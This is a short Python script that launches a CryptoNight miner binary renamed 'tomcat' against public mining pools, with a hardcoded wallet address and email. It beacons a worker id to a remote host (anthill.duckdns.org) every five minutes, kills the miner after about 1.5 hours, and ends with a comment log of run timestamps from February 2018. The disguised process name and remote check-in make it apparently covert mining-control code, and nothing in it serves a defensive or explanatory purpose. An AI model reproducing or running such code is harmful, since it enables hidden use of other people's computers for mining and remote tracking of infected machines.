import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:04.331450
#2018-02-17 16:09:03.905362
#2018-02-17 17:56:06.894439
#2018-02-17 19:44:05.734132
#2018-02-17 21:33:06.411889
#2018-02-17 23:18:01.677131
#2018-02-18 01:06:06.018709
#2018-02-18 02:52:07.378417
#2018-02-18 04:41:05.678668
#2018-02-18 06:33:05.325383
#2018-02-18 08:21:07.552800
#2018-02-18 10:09:05.785604
#2018-02-18 11:55:06.788776
#2018-02-18 13:40:06.108388
#2018-02-18 15:31:01.585010
#2018-02-18 17:19:04.381383
#2018-02-18 19:07:06.482220
#2018-02-18 20:53:06.540403
#2018-02-18 22:40:07.464344
#2018-02-19 00:29:04.982144
#2018-02-19 02:14:05.068580
#2018-02-19 04:02:07.181057
#2018-02-19 05:47:05.074431
#2018-02-19 07:34:04.227729
#2018-02-19 09:24:07.778647
#2018-02-19 11:14:01.647888
#2018-02-19 13:01:08.904593
#2018-02-19 14:48:07.891621
#2018-02-19 16:36:09.604589
#2018-02-19 18:22:08.804361
#2018-02-19 20:08:08.344334
#2018-02-19 21:59:01.292431
#2018-02-19 23:44:07.787451
#2018-02-20 01:32:01.667628
#2018-02-20 03:22:06.812320
#2018-02-20 05:08:06.364992
#2018-02-20 06:50:06.987322
#2018-02-20 08:37:01.607732
#2018-02-20 10:20:11.230191
#2018-02-20 12:05:10.093404
#2018-02-20 13:51:11.509508
#2018-02-20 15:36:06.862448
#2018-02-20 17:21:01.657879
#2018-02-20 19:11:08.788540
#2018-02-20 20:59:07.987876
#2018-02-20 22:45:04.521268
#2018-02-21 00:28:07.031188
#2018-02-21 02:13:04.826862
#2018-02-21 03:59:06.266864
#2018-02-21 05:46:01.408538
#2018-02-21 07:34:01.858237
#2018-02-21 09:18:01.978783
#2018-02-21 11:06:09.252712
#2018-02-21 12:54:06.045580
#2018-02-21 14:43:08.996498
#2018-02-21 16:32:11.633645
#2018-02-21 18:21:06.583121
#2018-02-21 20:06:06.203407
#2018-02-21 21:54:01.314930
#2018-02-21 23:41:07.969510
#2018-02-22 01:29:07.190113
#2018-02-22 03:17:01.698446
#2018-02-22 05:04:05.667880
#2018-02-22 06:47:01.587750
#2018-02-22 08:35:01.976370
#2018-02-22 10:22:08.445366
#2018-02-22 12:20:09.029354
#2018-02-22 14:04:01.703586
#2018-02-22 15:52:02.044873
#2018-02-22 17:39:06.727413
#2018-02-22 19:25:08.195533
#2018-02-22 21:15:08.210434
#2018-02-22 23:01:04.582691
#2018-02-23 00:47:08.201126
#2018-02-23 02:37:02.104494
#2018-02-23 04:24:06.542949
#2018-02-23 06:11:04.647899
#2018-02-23 07:56:05.533746
#2018-02-23 10:12:05.152666
#2018-02-23 12:05:12.932695
#2018-02-23 13:52:06.892645
#2018-02-23 15:42:06.214146
#2018-02-23 17:29:08.012378
#2018-02-23 19:16:05.347641
#2018-02-23 21:00:04.239428
#2018-02-23 22:54:01.480621
#2018-02-24 00:41:08.369247
#2018-02-24 02:32:03.762379
#2018-02-24 04:25:04.596950
#2018-02-24 06:10:04.925834
#2018-02-24 07:57:07.544055
#2018-02-24 09:42:01.407664
#2018-02-24 11:38:07.528122
#2018-02-24 13:29:01.919060
#2018-02-24 15:18:06.454255
#2018-02-24 17:07:05.114346
#2018-02-24 18:58:03.321162
#2018-02-24 20:45:07.670310
#2018-02-24 22:59:05.164435
#2018-02-25 02:17:01.404582
#2018-02-25 05:38:07.694258
#2018-02-25 11:35:07.206496